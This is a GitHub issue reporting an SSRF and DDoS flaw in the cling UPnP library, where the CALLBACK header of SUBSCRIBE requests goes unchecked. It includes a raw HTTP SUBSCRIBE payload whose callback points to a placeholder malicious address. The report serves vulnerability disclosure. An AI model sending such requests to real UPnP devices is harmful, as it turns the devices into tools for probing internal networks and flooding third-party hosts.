Skip to content

SSRF and DDOS vulnerability #253

New issue
New issue
Open
Open
SSRF and DDOS vulnerability#253
@YYHYlh

Description

@YYHYlh
YYHYlh
opened on Jun 10, 2020

The Upnp protocol implemented in the latest version of cling has a flaw, and the CALLBACK parameter in the request header of the service's subscribe request is not checked, resulting in the attacker using this flaw to send malicious data to the device developed using cling, which causes the device to specify to the attacker. A large amount of data is sent from the IP address of the IP address to implement a DDOS attack; at the same time, the vulnerability can be used to implement an SSRF attack on the intranet.
Payload is

SUBSCRIBE / HTTP/1.1
Host: localhost:9999
Accept-Encoding: identity
User-Agent: Callstranger Vulnerability Checker
CALLBACK: <Malicious address>
TIMEOUT: Second-300
NT: upnp:event
Content-Length: 0

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions